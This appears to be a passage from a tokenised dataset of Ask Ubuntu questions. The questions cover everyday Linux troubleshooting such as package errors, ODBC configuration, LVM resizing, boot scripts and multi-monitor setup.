//security.ubuntu.com trusty-security/universe translation-en_us w : failed to fetch http : //ppa.launchpad.net/yannubuntu/boot-repair/ubuntu/dists/trusty/main/binary-amd64/packages 404 not found w : failed to fetch http : //ppa.launchpad.net/yannubuntu/boot-repair/ubuntu/dists/trusty/main/binary-i386/packages 404 not found e : some index files failed to download . they have been ignored , or old ones used instead . yagel @ yagel-pc : ~ $ sudo sed 's/trusty/saucy/g ' -i /etc/apt/sources.list.d/yannubuntu-boot-repair-trusty.list *** //works yagel @ yagel-pc : ~ $ sudo apt-get install boot-repair *** reading package lists ... error ! e : encountered a section with no package : header e : problem with mergelist /var/lib/apt/lists/extras.ubuntu.com_ubuntu_dists_trusty_main_i18n_translation-en e : the package lists or status file could not be parsed or opened . what may the problem is ?
498707	which tasks in `` scheduled tasks '' ( gnome-schedule ) use anacron versus cron ?	i am trying to run a command once a day , but my machine is not always on . anacron says it 's meant for such purposes , but i prefer to use the gnome scheduled tasks gui program . if i schedule a task to run every day using the `` new '' recurrent task via scheduled tasks ( gnome-schedule ) , will the task be issued via cron or anacron ? that is , if the computer is off for a few days and i restart it , will the daily task run just once for that new day it starts and then daily thereafter ( i.e . like anacron ? ) . it 's not clear to me how cron and anacron are used by gnome schedule tasks . and do i really need to care which is used , so long as i go through this gui ?
498708	error message odbc_connect ( ) : sql error : [ unixodbc ] [ freetds ] [ sql server ]	i 'm trying to get my ubuntu server to connect to my sql server , without a lot of luck . i keep getting the error : warning : odbc_connect ( ) : sql error : [ unixodbc ] [ freetds ] [ sql server ] unable to connect to data source , sql state s1000 in sqlconnect in /var/www/ here is my info : distributor id : ubuntu description : ubuntu 10.04.1 lts release : 10.04 codename : lucid freetds.conf * # # $ id : freetds.conf , v 1.9 2003/12/04 22:26:55 freddy77 exp $ # the freetds.conf file is a replacement for the original interfaces file developed by sybase . you may use either this or the interfaces file , but not both . # freetds will search for a conf file in the following order : # 1 ) check if a file was set programatically via dbsetifile ( ) and is in .conf format , if so use that , # 2 ) otherwise , if env variable freetdsconf specifies a properly formatted config file , use it , # 3 ) otherwise , look in ~/.freetds.conf , # 4 ) otherwise , look in @ sysconfdir @ /freetds.conf # if freetds has found no suitable conf file it will then search for an interfaces file in the following order : # 1 ) check if a file was set programatically via dbsetifile ( ) and is in interfaces format , if so use that , # 2 ) look in ~/.interfaces # 3 ) look in $ sybase/interfaces ( where $ sybase is an environment variable ) # only hostname , port number , and protocol version can be specified using the interfaces format . # the conf file format follows a modified samba style layout . there is a [ global ] section which will affect all database servers and basic program behaviour , and a section headed with the database server 's name which will have settings which override the global ones . # note that environment variables tdsver , tdsdump , tdsport , tdsquery , and tdshost will override values set by a .conf or .interfaces file . # to review the processing of the above , set env variable tdsdumpconfig to a file name to log configuration processing . # global settings , any value here may be overridden by a database server specific section [ global ] # tds protocol version tds version = 8.0 ; initial block size = 512 # uses some fixes required for some bugged mssql 7.0 server that # return invalid data to big endian clients # note tds version 7.0 or 8.0 should be used instead ; swap broken dates = no ; swap broken money = no # database server login method , if both server and domain # logins are enabled , domain login is tried first if a domain # is specified , and if that fails the server login will be used . # obsolete ; try server login = yes ; try domain login = no # the default authentication domain , can be overridden by # specifying a username with a domain prefix , e.g . domain\username # obsolete use domain\username as username ; nt domain = workgroup # if the server responds with different domain try that one ? # obsolete never been used ; cross domain login = no # whether to write a tdsdump file for diagnostic purposes # ( setting this to /tmp is insecure on a multi-user system ) dump file = /tmp/freetds.log dump file append = yes ; debug level = 10 # command and connection timeouts ; timeout = 10 ; connect timeout = 10 # if you get out of memory errors , it may mean that your client # is trying to allocate a huge buffer for a text field . # ( microsoft servers sometimes pretend text columns are # 4 gb wide ! ) if you have this problem , try setting # 'text size ' to a more reasonable limit text size = 64512 this is a sybase hosted database server , if you are directly on the net you can use it to test . [ jdbc ] host = 192.138.151.39 port = 4444 tds version = 5.0 the same server , using tds 4.2 . used in configuration examples for the pool server , since the pool server supports only tds 4.2 . [ jdbc_42 ] host = 192.138.151.39 port = 4444 tds version = 4.2 the client connecting to the pool server will use this to find its listening socket . this entry assumes that the client is on the same system as the pool server . [ mypool ] host = 127.0.0.1 port = 5000 tds version = 4.2 a typical microsoft sql server 7.0 configuration ; [ myserver70 ] ; host = ntmachine.domain.com ; port = 1433 ; tds version = 7.0 a typical microsoft sql server 2000 configuration ; [ myserver2k ] ; host = ntmachine.domain.com ; port = 1433 ; tds version = 8.0 a typical microsoft sql server 6.x configuration ; [ myserver65 ] ; host = ntmachine.domain.com ; port = 1433 ; tds version = 4.2 sql server 1 [ srvsql ] host = 10.100.254.47 port = 1433 tds version = 4.2 [ srvsql1 ] host = # # . # # # . # # # .201 port = 1433 tds version = 4.2 [ srvtstsql1 ] host = # # . # # # . # # # .181 port = 1433 tds version = 4.2 [ srvsql2 ] host = # # . # # # . # # # .183 port = 1433 tds version = 8.0 tds version = 8.0 text size = 20971520 [ srvdvs1 ] host = # # . # # # . # # # .69 port = 1433 tds version = 8.0 odbcinst.ini * [ connection1 ] driver = freetds servername = srvsql2 database = database1 trace = no [ connection2 ] driver = freetds servername = srvsql database = database2 trace = no [ connection3 ] driver = freetds servername = srvsql2 database = datbase3 trace = no [ connection4 ] driver = freetds x64 servername = srvsql2 database = database1 trace = no odbcinst.ini * [ freetds ] description = tds driver for ms sql connections driver = /usr/lib/odbc/libtdsodbc.so setup = /usr/lib/odbc/libtdss.so fileusage = 1 [ freetds x64 ] description = v0.63 with protocol v8.0 driver = /usr/lib64/odbc/libtdsodbc.so setup = /usr/lib64/odbc/libtdss.so usagecount = 2 php code : // connect to dsn mssql with a user and password $ host = 'connection1 ' ; $ user = 'username ' ; $ pass = 'password ' ; $ connect = odbc_connect ( $ host , $ user , $ pass ) or die ( `` could n't connect '' ) ; $ result = odbc_exec ( $ connect , `` select identity_no , name from dbo.user '' ) ; while ( odbc_fetch_row ( $ result ) ) { print ( odbc_result ( $ result , `` identity_no '' ) . ' ' . odbc_result ( $ result , `` name '' ) . `` \n '' ) ; } odbc_free_result ( $ result ) ; odbc_close ( $ connect ) ; ? > ~
498709	how can i resize an active lvm partition ?	i am quite new to lvm and i 'm uncertain about what is happening here . i was not the one to initially setup this machine . there is a harddrive of 1tb in size and an lvm partition of only 50gb in size . i can not figure out how i can use the remaining space of the harddrive . output of command df -h : filesystem size used avail use % mounted on /dev/mapper/vg00-slash 46g 1.4g 42g 4 % / udev 3.9g 4.0k 3.9g 1 % /dev tmpfs 1.6g 236k 1.6g 1 % /run none 5.0m 0 5.0m 0 % /run/lock none 3.9g 0 3.9g 0 % /run/shm /dev/sda1 232m 29m 191m 14 % /boot output of command fdisk -l : disk /dev/sda : 1099.5 gb , 1099511627776 bytes 255 heads , 63 sectors/track , 133674 cylinders , total 2147483648 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x00038096 device boot start end blocks id system /dev/sda1 * 2048 499711 248832 83 linux /dev/sda2 501758 104855551 52176897 5 extended /dev/sda5 501760 104855551 52176896 8e linux lvm disk /dev/mapper/vg00-swap : 3997 mb , 3997171712 bytes 255 heads , 63 sectors/track , 485 cylinders , total 7806976 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x00000000 disk /dev/mapper/vg00-swap does n't contain a valid partition table disk /dev/mapper/vg00-slash : 49.4 gb , 49429872640 bytes 255 heads , 63 sectors/track , 6009 cylinders , total 96542720 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x00000000 disk /dev/mapper/vg00-slash does n't contain a valid partition table what i assume i had to do , was create a new partition on /dev/sda to contain the remaining space but when trying to create a new primary partition i am told i ca n't . last sector , +sectors or +size { k , m , g } ( 499712-501757 , default 501757 ) : +800g value out of range . i do not know what i can do now ... when trying to resize the logical volume i get : # lvresize vg00/slash -l +800g extending logical volume slash to 846.04 gib insufficient free space : 204800 extents needed , but only 0 available # pvdisplay -m -- - physical volume -- - pv name /dev/sda5 vg name vg00 pv size 49.76 gib / not usable 2.00 mib allocatable yes ( but full ) pe size 4.00 mib total pe 12738 free pe 0 allocated pe 12738 pv uuid wnzba3-bccs-nmql-bc9v-zusy-ttfq-bpaj3e -- - physical segments -- - physical extent 0 to 952 : logical volume /dev/vg00/swap logical extents 0 to 952 physical extent 953 to 12737 : logical volume /dev/vg00/slash logical extents 0 to 11784 ( parted ) print free model : vmware virtual disk ( scsi ) disk /dev/sda : 1100gb sector size ( logical/physical ) : 512b/512b partition table : msdos number start end size type file system flags 32.3kb 1049kb 1016kb free space 1 1049kb 256mb 255mb primary ext4 boot 256mb 257mb 1048kb free space 2 257mb 53.7gb 53.4gb extended 5 257mb 53.7gb 53.4gb logical lvm 53.7gb 1100gb 1046gb free space
498711	should i install ubuntu as 32 bit or 64 bit since i have 3gb ram ?	i have a compaq presario cq60 with 3 gb ram and 32 bit operating system and i do n't if i should 32 bit since it say 2 gb or less ram . so should i pic 32 bit or 64 bit .
498713	`` cloning '' a server	i have recently been tasked with making a dev version of one of my production servers ( both 12.04lts ) . if i could create an image on my cloud service , it would be simple . problem , these are both hosted on 2 different cloud service ( firehost and azure ) . i did not create the production server in question , but i need to make sure i at least have all of the same packages installed . i have tried : dpkg -- get-selections and did a diff between the dpkg 's for both servers , but since this list include all dependencies installed , which is quite a large list and would take a while to sort through . 2 questions i guess : 1 . ) am i going about this the proper way ? if yes , 2 . ) can i get a list of just the top level packages installed ?
498717	re-install font ubuntu 14.04	i 'm using ubuntu 14.04 . i installed some packages and the system fonts changed . the characters in the terminal overlap and it makes it difficult to read . i tried unity-reset but that did n't seem to make a difference . i tried resetting dconf using this dconf reset -f /org/compiz/ as well , but there was no change . i finally re-installed unity but i still see the same messed up fonts . i tried to reinstall fonts , but there was n't much about how to do it . any suggestions ? edit : i tried to install linuxdcpp and ettercap . the issue seemed to start after installing ettercap . the commands i used to install the packages are : sudo apt-get install libgtk2.0-dev libgtkmm-2.4-dev libglademm-2.4-dev zlib1g-dev libbz2-dev g++-3.4 libgtk2.0-0 libgtk2.0-bin libgtk2.0-common g++ libgtkmm-2.4-1 libglademm-2.4-1 scons sudo apt-get install linuxdcpp sudo apt-get install libpcre3-dev libpcap0.8-dev libnet1-dev openssl libssl-dev ncurses-bin libncurses5-dev libnet6-1.3-dev libpthread-stubs0-dev zlib1g-dev libltdl-dev pango-graphite pkg-config libpango1.0-dev libatk1.0-dev libgtk2.0-dev sudo apt-get install ettercap-gtk ettercap-common
498719	can openbox use nm-applet.desktop ?	folks , i am running minimal ubuntu 14.04 + openbox + network-manager . in the past , when i bring up openbox , `` ps '' would reveal that nm-applet is running ( because of /etc/xdg/autostart/nm-applet.desktop ) . however , there would be no visible icon for me to configure wireless , etc . the following is the workaround i used to use : sudo apt-get install docker sudo rm /etc/xdg/autostart/nm-applet.desktop edit autostart and add the following two lines docker & ( sleep 3 & & nm-applet ) & this ensured that docker runs before nm-applet and the icon becomes visible under docker . however , i would prefer to use /etc/xdg/autostart/nm-applet.desktop , if possible , and not go through this workaround . is this possible ? regards , peter
498724	bluetooth could not be turned on hp laptop g6 2230tx the fn key along with the wireless button does not help	i am using ubuntu 14.04lts on my hp pavillion g6 2230tx laptop . it supports a ralink driver . how do i get it working . plz give me a step by step procedure..
498726	how to disable suspend and hibernate functions ?	i do n't use neither suspend nor hibernate pc function at all . i do only shutdown and reboot . however it comes into my way sometimes , i.e . when i accidentally click on `` suspend '' instead of `` shutdown '' in the system menu . it is easy to make mistake since those two items are close to each other . how can i get rid of the suspend and hibernate functions ? i am running ubuntu 14.04 lts , and the only setting i found is disabling suspend when i close the lid of my laptop . right , it is useful , but still not enough for me , i want to disable suspend/hibernate for good in any context . is it possible ?
498728	create startup script for openproject	i consider myself a linux noob , but i was able to install openproject on a ubuntu 12.04 server in virtualbox . currently i have to manually start the web-server every time i power-up the virtual machine with the following commands : su openproject -c `` bash -l '' ( enter the password ) cd ~\openproject\config\ rails_env= '' production '' bundle exec rails server how would i set this up ( script ) so that it automatically starts the web server when the vm powers up , without me having to log in and enter the above commands ? could it please be explained in step-by-step process as i am still learning how to use linux ( command-line ) . thanks in advance : )
498733	wan na to make password shorter less than 4 character in ubuntu 14.04 lts	hello please help me to short the length of password in ubuntu 14.04 lts . i tried some method like edit the file /etc/pam.d/common-password and make minlen=4 but this is not working becoz terminal says u have only permission to read but not to write . so suggest some way to come out of this problem
498734	firefox spellchecker often not enabled properly	i 'm using ubuntu 14.04 and its built-in version of firefox , which is currently version 30.0 . on some web pages spellchecker is working properly , but on many it does not . if i right-click in a text box the `` check spelling '' option is checked , but then if i go to the languages entry that appears right below that , `` english ( united states ) '' does n't have a dot next to it , meaning it 's not selected , and i 'm not getting any spellchecking functionality . it 's the only language available in the list . if i then click on `` english '' the spell checker starts working . so , when using text boxes on some websites `` english '' is selected and the spellchecker works , but on many many others , including here , `` english '' is n't selected and spellchecker does n't work until i select `` english '' manually . does anyone know why this is ? doing a google search for the issue it seems like firefox has a history of spellchecking issues .
498738	interfaces not created after upgrade 13.04 to 14.04	i just upgraded my server used for kvm from 13.04 to 14.04 ( with 13.10 in between ) . afterwards , the various sub interfaces and bridge interfaces are missing . the configuration is still present in /etc/network/interfaces . i tried restarting networking , and rebooting , with no help . any suggestions ? update , here is an excerpt showing bridge and sub interface configuration : # connection to mtg-c0901 gig0/2/0/19 auto eth1 iface eth1 inet manual # subinterface for vlan821 auto eth1.821 iface eth1.821 inet manual vlan-raw-device eth1 # subinterface for vlan822 auto eth1.822 iface eth1.822 inet manual vlan-raw-device eth1 # vlan 821 auto br821 iface br821 inet static bridge_ports eth1.821 bridge_stp off bridge_fd 0 bridge_maxwait 0 # vlan 822 auto br822 iface br822 inet static bridge_ports eth1.822 bridge_stp off bridge_fd 0 bridge_maxwait 0 i also noticed during boot , i see the message `` booting system without full network configuration ''
498739	how to start program after sshd is up and running	i 'm working on a project that requires i start a gui before the login prompt . i had this working under 12.10 , but today i migrated to 14.04 and it 's breaking stuff . at this point i 've configured grub to boot in text mode and i 've written a script s99startprogram in the /etc/init.d directory that is being placed as in /etc/rcs.d after i run : update-rc.d startprogram start 99 s . my header at the top of the script is : # # # begin init info # provides : vtti_startprogram # x-start-before : x11-common # required-start : $ remote_fs $ network $ syslog $ sshd # required-stop : $ remote_fs $ network $ syslog $ sshd # default-start : s # default-stop : # short-description : start software at boot time # description : debian init script to start software at boot time # # # end init info the script seems to be working , however , it 's not starting after sshd which means i 'm being blocked from sshing into the system once the programs xsession starts . i tried running : service -- status-all and that provided me with the output : [ + ] acpid [ - ] anacron [ - ] apparmor [ ? ] apport [ - ] avahi-daemon [ + ] bluetooth [ - ] brltty [ ? ] console-setup [ + ] cron [ + ] cups [ + ] cups-browsed [ - ] dbus [ ? ] dns-clean [ + ] friendly-recovery [ - ] grub-common [ ? ] irqbalance [ + ] kerneloops [ ? ] killprocs [ ? ] kmod [ ? ] lightdm [ ? ] networking [ ? ] ondemand [ ? ] pppd-dns [ - ] procps [ - ] pulseaudio [ ? ] rc.local [ + ] resolvconf [ - ] rsync [ + ] rsyslog [ + ] saned [ ? ] screen-cleanup [ ? ] sendsigs [ ? ] speech-dispatcher [ - ] ssh [ - ] sudo [ - ] udev [ ? ] umountfs [ ? ] umountnfs.sh [ ? ] umountroot [ - ] unattended-upgrades [ - ] urandom [ - ] x11-common i also tried running : service ssh stop and i 'm still able to ssh into the device . the only other boot system i 've encountered is systemd , but from what i 've read ( even though there are tons of systemd directories on ubuntu ) ubuntu does n't use systemd out of the box . can someone please explain to me what is going on ? where is sshd being run from ? and how do i make my script wait till after it 's done ? thanks in advance ! !
498740	pair programming in ubuntu sdk ?	how do you do collaborative code editing , aka pair programming , in the ubuntu sdk ? i heard you can do this in vim , and i wonder if the vim functionality in qtcreator makes this possible .
498741	how to display complete autocompletion in grub2 shell ?	if one issues tab in the grub2 console , the autocompletion proposals are written on the screen . if the output for < prefix > exceeds the size of the screen , there 's no way to get the top commands/autocompletion proposals except issueing the autocompletion for < prefix > n , < prefix > m , < prefix > l , ... if is the last visible autocompletion proposals start with < prefix > o . how to do that smarter ?
498742	ubuntu wo n't detect an external monitor at all	i am running ubuntu on an asus laptop and when i try to plug in my monitor , the monitor will turn on and display no signal . when i go to display settings it will never show my monitor no matter how many times i click detect display . the only thing plug which both my computer and the monitor have is vga and i have tried several vga cables . i have been told to look at nvidia x server settings but when i do that the options i have are application and profile , nothing about monitors . i have tried to find answers elsewhere on the web but i have come up empty . help !
498744	12.04 lts will not load	ubuntu 12.04 lts will boot to the log in . when i try to log in get message `` failed to load session `` ubuntu '' '' . was ok till i removed some files to free up more memory . know now that was dumb but now what ? ? will not boot from cd , just hard drive . will run windows xp but have some problems there also .
498745	no sound after updates in xubuntu 12.04	after installing updates all my computer was muted . i have tried turning the volume up in gnome alsa mixer and i switched to pulse audio but nothing worked . does anyone else who has encountered this problem know how to fix it ?
498747	playonlinux : wine crashes ( problem 1 )	i 've posted about this on : http : //www.playonlinux.com/en/topic-12143.html but this website is easier to navigate ( i can go back to my questions : | ) and has a great community . so here 's what 's in the link hello dear community of pol this is my second time writing this , because of my clumpsy fingers . this program is awesome , i knew i had to get it when i discovered it , but it has been a journey of one problem after another . problems are concerned with : wine , steam , and .net ( whatever that is ) . let 's start with the first one , and more to the others ( this might take a couple of threads ) . enjoy the ride . error in pol_wine wine seems to have crashed if your program is running , just ignore this message according to this post ( yes i read it , hope it helps ) : > http : //www.playonlinux.com/en/topic-659-how_to_explain_your_problems.html i want to add some more information : i use ubuntu 14.04 i 've installed wine1.6 from ubuntu software center , after installing wine1.7 since 1.7 is still in beta i 'm new to linux , but i think my desktop is unity so here is what happens : i choose to install the game ( magicka ) -- > open installer -- > wine 1.5.20 is being downloaded -- > wine is being extracted -- > i choose `` use steam store version '' -- > `` please wait while directx runtime is installed '' -- > `` registering libraries , please wait// ( it can take a while ) '' -- > `` please wait while . net framework 2.0 is installed '' -- > error , sad face , and the message above appears . i do n't know what to put for computer specifications thanks for the help : )
498748	dual boot windows 7 and ubuntu 14.04 problems	i have been looking into dual booting ubuntu 14.04 64 bit with windows 7 professional 64 bit and have been running into issues with ubuntu 's installer not detecting the windows 7 installation . here is what i have read and tried . relevant computer details : i7-4500u 8 gb ram 256 gb ssd installation process ( this worked for me before on a different laptop ) : 1 . booted using windows installation disk , deleted all the partitions and then made 1 209 gb partition for windows and another for ubuntu . 2 . installed windows 3 . tried to install ubuntu but it could not locate the windows 7 tried to do $ sudo apt-get install gdisk $ sudo fixparts /dev/sda and then press the key 'w' as read in another post but that did n't do anything . i still had the same problem . an interesting note is that i got the message `` warning:0xee partition does n't start on sector 1 . this can cause problems in some oses '' when i ran fixparts . looked it up on google and it seemed fairly irrelevant . if it is relevant please let me know . after i did that , ubuntu installer still would n't find the windows 7 os . any help would be appreciated . thanks .
498751	rstan installation fails with internal compiler error	i 'm trying to install rstan in r 3.1.1 on ubuntu 14.04 i-386 , but get the following error message : $ r > sys.setenv ( makeflags = `` -j4 '' ) > source ( 'http : //mc-stan.org/rstan/install.r ' , echo = true , max.deparse.length = 2000 ) > install_rstan ( ) * installing *source* package ârstanâ ... ** libs ** arch - g++ -i/usr/share/r/include -dndebug -i '' ../inst/include/stansrc '' -isystem '' ../inst/include/stanlib/eigen_3.2.0 '' -isystem '' ../inst/include/stanlib/eigen_3.2.0/unsupported '' -isystem '' ../inst/include/stanlib/boost_1.54.0 '' -i '' ../inst/include '' -dboost_result_of_use_tr1 -dboost_no_decltype -dboost_disable_asserts -ftemplate-depth-256 -i '' /usr/local/lib/r/site-library/rcpp/include '' -fpic -o3 -c stanc.cpp -o stanc.o g++ : internal compiler error : killed ( program cc1plus ) [ note : for me it fails compiling gm__grammars__functions_grammar_inst.cpp ] i have the build-essential & g++ ubuntu packages installed , as well as the r packages rcpp & inline , & my makeconf file contains cxxflags = -g -o3 -o2 -fstack-protector -- param=ssp-buffer-size=4 -wformat -werror=format-security -d_fortify_source=2 -g $ ( lto ) after adding -o3 as suggested here . i 'd be grateful for any advice .
498752	nautilus opens with hidden files	as the title says , every time when i open nautilus from unity launcher , it opens with all files being shown . normally it opens with hidden files being hidden , how can i change it back to that behavior ? my system is ubuntu 14.04 lts with unity , no other wm/dm 's are installed .
498753	how do i tell libre office to stop transferring me to a footnote ?	when editing a document rather than highlighing a word , libre office sends me to a previous footnote . all i need is a page number in the footnote and nothing else . how do i tell libre office to stop transferring me to a footnote unless i specifically want to be there ?
498754	too many lock screens	i installed a few different gui environments for ubuntu 14.04 and i finally settled on kde . however , when i lock my desktop and come back to it i have to sign in twice ... i have two different looking lock screens ... why ? how do i heal this ?
498757	playonlinux wo n't install ?	i 'm running 12.04 lts , and whenever i try to install playonlinux , i keep getting this error : the following packages have unmet dependencies : playonlinux : depends : python-wxgtk2.8 but it is not going to be installed depends : mesa-utils but it is not going to be installed primus-libs-ia32 : depends : primus-libs but it is not going to be installed e : unmet dependencies . try 'apt-get -f install ' with no packages ( or specify a solution ) . i previously installed bumblebee and primus so i could optimize my games on steam . is there any way to fix this ?
498759	ubuntu 12.04 lts crash after updating from software updater	i updated my system today and noticed that there was a hardware update as well . i 've never heard of a hardware update but i updated anyway . system had to be restarted after update but i was unsuccessful . i was informed that the system could only start in low graphic mode and that screen , graphics card , and input device settings could not be detected correctly . when i try to start in low graphic mode , the system freezes . i do n't know how to resolve this .
498767	unable to start genymotion in ubuntu 12.04	i am trying to start genymotion in ubuntu 12.04 , but i am getting the following error : ~ $ sudo lshw -c video *-display unclaimed description : vga compatible controller product : gk208m [ geforce gt 730m ] vendor : nvidia corporation physical id : 0 bus info : pci @ 0000:02:00.0 version : a1 width : 64 bits clock : 33mhz capabilities : pm msi pciexpress vga_controller bus_master cap_list configuration : latency=0 resources : memory : f0000000-f0ffffff memory : c0000000-cfffffff memory : d0000000-d1ffffff ioport:3000 ( size=128 ) *-display description : vga compatible controller product : 4th gen core processor integrated graphics controller vendor : intel corporation physical id : 2 bus info : pci @ 0000:00:02.0 version : 06 width : 64 bits clock : 33mhz capabilities : msi pm vga_controller bus_master cap_list rom configuration : driver=i915 latency=0 resources : irq:51 memory : f1000000-f13fffff memory : e0000000-efffffff ioport:4000 ( size=64 ) i have been having problems in setting up my nvidia driver . i have a geforce gt 730m . but right now the nvidia drivers are not in use but activated . the following is the output from the additional drivers ui : also : $ sudo dpkg -- get-selections | grep nvidia nvidia-304 install nvidia-304-updates install nvidia-331 install nvidia-331-updates install nvidia-current install nvidia-current-updates install nvidia-settings install $ glxinfo | grep vendor xlib : extension `` glx '' missing on display `` :0 '' . xlib : extension `` glx '' missing on display `` :0 '' . xlib : extension `` glx '' missing on display `` :0 '' . xlib : extension `` glx '' missing on display `` :0 '' . xlib : extension `` glx '' missing on display `` :0 '' . error : could n't find rgb glx visual or fbconfig xlib : extension `` glx '' missing on display `` :0 '' . xlib : extension `` glx '' missing on display `` :0 '' . xlib : extension `` glx '' missing on display `` :0 '' . xlib : extension `` glx '' missing on display `` :0 '' . xlib : extension `` glx '' missing on display `` :0 '' . xlib : extension `` glx '' missing on display `` :0 '' . xlib : extension `` glx '' missing on display `` :0 '' . can anyone help me solve this ? i also asked a similar question before , where i was trying to setup the nvidia drivers , but it did n't work out completely .
498768	configuring two sets of mirrored displays	i 'm trying to configure several ubuntu 14.04 desktop workstations , each of which has a total of 4 monitors . i would like to configure them so that there are 2 independent screens , each of which is mirrored on two monitors . i currently have all 4 monitors mirroring the same output with the correct resolution . i attempted to use xrandr to position two of my monitors relative to the others , and use -- same-as to do the mirroring , like so : xrandr -- output displayport-0 -- primary xrandr -- output displayport-1 -- same-as displayport-0 xrandr -- output displayport-1-2 -- right-of displayport-0 xrandr -- output displayport-1-3 -- same-as displayport-1-2 as soon as i attempt to run the script containing these commands , two of the monitors ( the ones xrandr calls displayport-1-2 and displayport-1-3 ) freeze on the image they are currently displaying and no longer update . the weird thing is if i look at the configuration graphically with arandr , the monitors are laid out exactly as i expect them to be . i 'm no expect with xrandr though , so i could be doing something stupid here . i 'm using the radeon drivers and xfce if that matters . i tried using the display settings menus in both unity and xfce before trying to use xrandr manually , but had even less success with those . the output of sudo lshw -c video is : *-display description : vga compatible controller product : rv620 gl [ firepro 2260 ] vendor : advanced micro devices , inc. [ amd/ati ] physical id : 0 bus info : pci @ 0000:03:00.0 version : 00 width : 64 bits clock : 33mhz capabilities : pm pciexpress msi vga_controller bus_master cap_list rom configuration : driver=radeon latency=0 resources : irq:109 memory : d0000000-dfffffff memory : f7df0000-f7dfffff ioport : dc00 ( size=256 ) memory : f7e00000-f7e1ffff *-display description : vga compatible controller product : rv620 gl [ firepro 2260 ] vendor : advanced micro devices , inc. [ amd/ati ] physical id : 0 bus info : pci @ 0000:04:00.0 version : 00 width : 64 bits clock : 33mhz capabilities : pm pciexpress msi vga_controller bus_master cap_list rom configuration : driver=radeon latency=0 resources : irq:110 memory : e0000000-efffffff memory : f7bf0000-f7bfffff io the output of xrandr ( after running the commands i showed above ) is : screen 0 : minimum 320 x 200 , current 3840 x 1200 , maximum 8192 x 8192 displayport-0 connected primary 1920x1200+0+0 ( normal left inverted right x axis y axis ) 518mm x 324mm 1920x1200 60.0*+ 1600x1200 60.0 1280x1024 75.0 60.0 1152x864 75.0 1024x768 75.1 60.0 800x600 75.0 60.3 640x480 75.0 60.0 720x400 70.1 displayport-1 connected 1920x1200+0+0 ( normal left inverted right x axis y axis ) 518mm x 324mm 1920x1200 60.0*+ 1920x1080 60.0 50.0 59.9 24.0 24.0 1920x1080i 60.1 50.0 60.0 1600x1200 60.0 1280x1024 75.0 60.0 1152x864 75.0 1280x720 60.0 50.0 59.9 1440x576i 50.1 1024x768 75.1 60.0 1440x480i 60.1 60.1 800x600 75.0 60.3 720x576 50.0 720x480 60.0 59.9 640x480 75.0 60.0 59.9 720x400 70.1 displayport-1-2 connected 1920x1200+1920+0 518mm x 324mm 1920x1200 60.0*+ 1920x1080 60.0 50.0 59.9 24.0 24.0 1920x1080i 60.1 50.0 60.0 1600x1200 60.0 1280x1024 75.0 60.0 1152x864 75.0 1280x720 60.0 50.0 59.9 1440x576i 50.1 1024x768 75.1 60.0 1440x480i 60.1 60.1 800x600 75.0 60.3 720x576 50.0 720x480 60.0 59.9 640x480 75.0 60.0 59.9 720x400 70.1 displayport-1-3 connected 1920x1200+1920+0 518mm x 324mm 1920x1200 60.0*+ 1600x1200 60.0 1280x1024 75.0 60.0 1152x864 75.0 1024x768 75.1 60.0 800x600 75.0 60.3 640x480 75.0 60.0 720x400 70.1 1920x1200 ( 0x44 ) 154.0mhz h : width 1920 start 1968 end 2000 total 2080 skew 0 clock 74.0khz v : height 1200 start 1203 end 1209 total 1235 clock 60.0hz 1920x1080 ( 0x45 ) 148.5mhz h : width 1920 start 2008 end 2052 total 2200 skew 0 clock 67.5khz v : height 1080 start 1084 end 1089 total 1125 clock 60.0hz 1920x1080 ( 0x46 ) 148.5mhz h : width 1920 start 2448 end 2492 total 2640 skew 0 clock 56.2khz v : height 1080 start 1084 end 1089 total 1125 clock 50.0hz 1920x1080 ( 0x47 ) 148.4mhz h : width 1920 start 2008 end 2052 total 2200 skew 0 clock 67.4khz v : height 1080 start 1084 end 1089 total 1125 clock 59.9hz 1920x1080i ( 0x48 ) 74.2mhz h : width 1920 start 2008 end 2052 total 2200 skew 0 clock 33.8khz v : height 1080 start 1084 end 1094 total 1125 clock 60.1hz 1920x1080i ( 0x49 ) 74.2mhz h : width 1920 start 2448 end 2492 total 2640 skew 0 clock 28.1khz v : height 1080 start 1084 end 1094 total 1125 clock 50.0hz 1920x1080 ( 0x4a ) 74.2mhz h : width 1920 start 2558 end 2602 total 2750 skew 0 clock 27.0khz v : height 1080 start 1084 end 1089 total 1125 clock 24.0hz 1920x1080i ( 0x4b ) 74.2mhz h : width 1920 start 2008 end 2052 total 2200 skew 0 clock 33.7khz v : height 1080 start 1084 end 1094 total 1125 clock 60.0hz 1920x1080 ( 0x4c ) 74.2mhz h : width 1920 start 2558 end 2602 total 2750 skew 0 clock 27.0khz v : height 1080 start 1084 end 1089 total 1125 clock 24.0hz 1600x1200 ( 0x4d ) 162.0mhz h : width 1600 start 1664 end 1856 total 2160 skew 0 clock 75.0khz v : height 1200 start 1201 end 1204 total 1250 clock 60.0hz 1280x1024 ( 0x4e ) 135.0mhz h : width 1280 start 1296 end 1440 total 1688 skew 0 clock 80.0khz v : height 1024 start 1025 end 1028 total 1066 clock 75.0hz 1280x1024 ( 0x4f ) 108.0mhz h : width 1280 start 1328 end 1440 total 1688 skew 0 clock 64.0khz v : height 1024 start 1025 end 1028 total 1066 clock 60.0hz 1152x864 ( 0x50 ) 108.0mhz h : width 1152 start 1216 end 1344 total 1600 skew 0 clock 67.5khz v : height 864 start 865 end 868 total 900 clock 75.0hz 1280x720 ( 0x51 ) 74.2mhz h : width 1280 start 1390 end 1430 total 1650 skew 0 clock 45.0khz v : height 720 start 725 end 730 total 750 clock 60.0hz 1280x720 ( 0x52 ) 74.2mhz h : width 1280 start 1720 end 1760 total 1980 skew 0 clock 37.5khz v : height 720 start 725 end 730 total 750 clock 50.0hz 1280x720 ( 0x53 ) 74.2mhz h : width 1280 start 1390 end 1430 total 1650 skew 0 clock 45.0khz v : height 720 start 725 end 730 total 750 clock 59.9hz 1440x576i ( 0x54 ) 27.0mhz h : width 1440 start 1464 end 1590 total 1728 skew 0 clock 15.6khz v : height 576 start 580 end 586 total 625 clock 50.1hz 1024x768 ( 0x55 ) 78.8mhz h : width 1024 